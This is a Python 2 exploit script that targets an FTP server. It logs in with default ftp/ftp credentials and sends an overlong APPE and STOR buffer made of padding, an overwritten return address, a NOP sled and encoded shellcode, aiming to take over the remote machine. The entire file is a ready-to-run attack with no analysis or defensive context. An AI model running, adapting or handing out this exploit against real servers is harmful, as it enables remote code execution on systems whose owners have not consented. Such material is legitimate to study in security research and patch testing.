import socket,sys
print "[+] Usage : exploit.py <ip> <port(21)> \r\n"
junk = "A" * 969
nop = "\x90" * 32
eip = "\x7C\x83\x69\xF0"
shellcode = ( "\xda\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x56\xbf\x9d\x28"
"\xd0\x22\x83\xee\xfc\x31\x7e\x14\x03\x7e\x89\xca\x25\xde"
"\x59\x83\xc6\x1f\x99\xf4\x4f\xfa\xa8\x26\x2b\x8e\x98\xf6"
"\x3f\xc2\x10\x7c\x6d\xf7\xa3\xf0\xba\xf8\x04\xbe\x9c\x37"
"\x95\x0e\x21\x9b\x55\x10\xdd\xe6\x89\xf2\xdc\x28\xdc\xf3"
"\x19\x54\x2e\xa1\xf2\x12\x9c\x56\x76\x66\x1c\x56\x58\xec"
"\x1c\x20\xdd\x33\xe8\x9a\xdc\x63\x40\x90\x97\x9b\xeb\xfe"
"\x07\x9d\x38\x1d\x7b\xd4\x35\xd6\x0f\xe7\x9f\x26\xef\xd9"
"\xdf\xe5\xce\xd5\xd2\xf4\x17\xd1\x0c\x83\x63\x21\xb1\x94"
"\xb7\x5b\x6d\x10\x2a\xfb\xe6\x82\x8e\xfd\x2b\x54\x44\xf1"
"\x80\x12\x02\x16\x17\xf6\x38\x22\x9c\xf9\xee\xa2\xe6\xdd"
"\x2a\xee\xbd\x7c\x6a\x4a\x10\x80\x6c\x32\xcd\x24\xe6\xd1"
"\x1a\x5e\xa5\xbd\xef\x6d\x56\x3e\x67\xe5\x25\x0c\x28\x5d"
"\xa2\x3c\xa1\x7b\x35\x42\x98\x3c\xa9\xbd\x22\x3d\xe3\x79"
"\x76\x6d\x9b\xa8\xf6\xe6\x5b\x54\x23\xa8\x0b\xfa\x9b\x09"
"\xfc\xba\x4b\xe2\x16\x35\xb4\x12\x19\x9f\xc3\x14\xd7\xfb"
"\x80\xf2\x1a\xfc\x33\xb0\x92\x1a\x51\xa6\xf2\xb5\xcd\x04"
"\x21\x0e\x6a\x76\x03\x22\x23\xe0\x1b\x2c\xf3\x0f\x9c\x7a"
"\x50\xa3\x34\xed\x22\xaf\x80\x0c\x35\xfa\xa0\x47\x0e\x6d"
"\x3a\x36\xdd\x0f\x3b\x13\xb5\xac\xae\xf8\x45\xba\xd2\x56"
"\x12\xeb\x25\xaf\xf6\x01\x1f\x19\xe4\xdb\xf9\x62\xac\x07"
"\x3a\x6c\x2d\xc5\x06\x4a\x3d\x13\x86\xd6\x69\xcb\xd1\x80"
"\xc7\xad\x8b\x62\xb1\x67\x67\x2d\x55\xf1\x4b\xee\x23\xfe"
"\x81\x98\xcb\x4f\x7c\xdd\xf4\x60\xe8\xe9\x8d\x9c\x88\x16"
"\x44\x25\xb8\x5c\xc4\x0c\x51\x39\x9d\x0c\x3c\xba\x48\x52"
"\x39\x39\x78\x2b\xbe\x21\x09\x2e\xfa\xe5\xe2\x42\x93\x83"
"\x04\xf0\x94\x81" );
rest = "C" * 627
buffer = junk + eip + nop + shellcode + rest
host = sys.argv[ 1 ]
port = sys.argv[ 2 ]
dz = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dz.connect((host, int (port)))
data = dz.recv( 1024 )
print "[+]" + data
dz.send( "USER ftp\r\n" )
data = dz.recv( 1024 )
print "[+]" + data
dz.send( "PASS ftp\r\n" )
data = dz.recv( 1024 )
print "[+]" + data
dz.send( "APPE" + buffer + "\r\n" )
data = dz.recv( 1024 )
print "[+]" + data
dz.send( "STOR" + buffer + "\r\n" )
data = dz.recv( 1024 )
print "[+]" + data
print "[+]" + "Sending Shellcode ..."
dz.close()
|